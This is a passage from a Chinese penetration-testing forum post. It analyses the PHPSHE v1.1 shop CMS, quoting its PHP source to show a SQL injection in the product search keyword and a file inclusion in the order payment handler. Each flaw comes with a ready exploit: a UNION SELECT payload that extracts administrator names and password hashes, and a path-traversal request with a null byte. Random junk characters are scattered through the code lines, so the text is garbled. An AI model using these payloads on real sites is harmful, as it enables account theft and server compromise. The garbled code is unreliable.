0×02 搜索注入, M# G/ Z/ \4 t/ v& t7 ? M( S
<code id="code2">
//product.php文件
case 'list':* l0 X* l8 c6 h: K2 s4 p4 ^( x3 P
$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));2 A2 E3 A0 d$ B/ s# S W; x
//搜索2 [% W! T! b8 ?8 L' `& r( E6 W
$sqlwhere = " and `product_state` = 1";3 ^ Z! N0 u' ?, z: \0 y. }$ G: m' H
pe_lead('hook/category.hook.php');
if ($category_id) {: [1 L; \3 {9 \3 S
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
}
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤; W) o6 X7 w3 S6 d- d& x
if ($_g_orderby) {
$orderby = explode('_', $_g_orderby);
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";4 o% ?+ z4 y% D2 I
}0 Z( P2 ?1 [$ p9 P
else {5 T6 c4 ?0 R% Q0 ~3 A
$sqlwhere .= " order by `product_id` desc";- g0 O8 S: E' ]# L6 ?( x3 L
}, F# O8 u9 O T: P# W
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
//热卖排行
$product_hotlist = product_hotlist();' m$ O- R# h& L- H3 K- N0 S
//当前路径- J# O2 y1 f0 J- L) }
$nowpath = category_path($category_id);. a7 \' x* t; |" d# W
$seo = pe_seo($info['category_name']);# }% n8 ^: O( l, g K; C
include(pe_tpl('product_list.html'));
//跟进selectall函数库
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
//处理条件语句) x( ?* k. B! c n; s {- v2 N
$sqlwhere = $this->_dowhere($where);
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}3 D( Q: c8 ~2 n9 ?4 y
//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1) \1 Z2 u0 J( U/ x7 l
</code>
0×03 包含漏洞2
<code id="code3">
//order.php
case 'pay':
$order_id = pe_dbhold($_g_id);
7 |2 \1 L* m9 d! ^! h6 J
$cache_payway = cache::get('payway');
foreach($cache_payway as $k => $v) {
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
& ~ w# {+ ~8 m/ u; |! Y
if ($k == 'bank') {
0 A8 }* Y; q2 j3 S% h6 v
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
* m- ^/ f+ s0 s+ D; t8 L5 S! o
}
' j) P* [: R, V5 P! X3 Z
}
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
!$order['order_id'] && pe_error('订单号错误...');
if (isset($_p_pesubmit)) {
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
( `- |( J6 a- j9 ^
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
foreach ($info_list as $v) {
$order['order_name'] .= "{$v['product_name']};";: X% s! P1 l& W: A/ H( J
}
+ X; A& L0 N" p: I2 Y$ |
echo '正在为您连接支付网站,请稍后...';
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
: [ X) v% F- O
}//当一切准备好的时候就可以进行"鸡肋包含了"
, Z% ?/ Z5 z( n8 R/ z
else {
pe_error('支付错误...');
}
}
$seo = pe_seo('选择支付方式');
include(pe_tpl('order_pay.html'));
break;
}
//exp:
//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001
//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |